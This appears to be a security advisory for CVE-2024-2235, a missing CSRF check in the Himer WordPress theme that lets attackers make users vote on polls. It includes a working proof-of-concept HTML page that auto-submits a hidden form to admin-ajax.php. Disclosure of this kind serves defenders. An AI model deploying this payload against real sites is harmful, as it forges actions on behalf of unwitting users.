Himer – Social Questions and Answers < 2.1.1 – Bypass Poll Voting Restrictions via CSRF | CVE 2024-2235

Description

The theme does not have CSRF checks in some places, which could allow attackers to make users vote on any polls, including those they don't have access to via a CSRF attack

Proof of Concept

As a logged out visitor, open an HTML file containing the following (where `poll_id` is a valid poll):

```
<form action="https://www.example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpqa&#95;question&#95;poll" />
      <input type="hidden" name="poll&#95;id" value="3" />
      <input type="hidden" name="post&#95;id" value="6661" />
      <input type="hidden" name="pollfrom&#91;0&#93;&#91;name&#93;" value="ask&#95;radio" />
      <input type="hidden" name="pollfrom&#91;0&#93;&#91;value&#93;" value="poll&#95;3" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```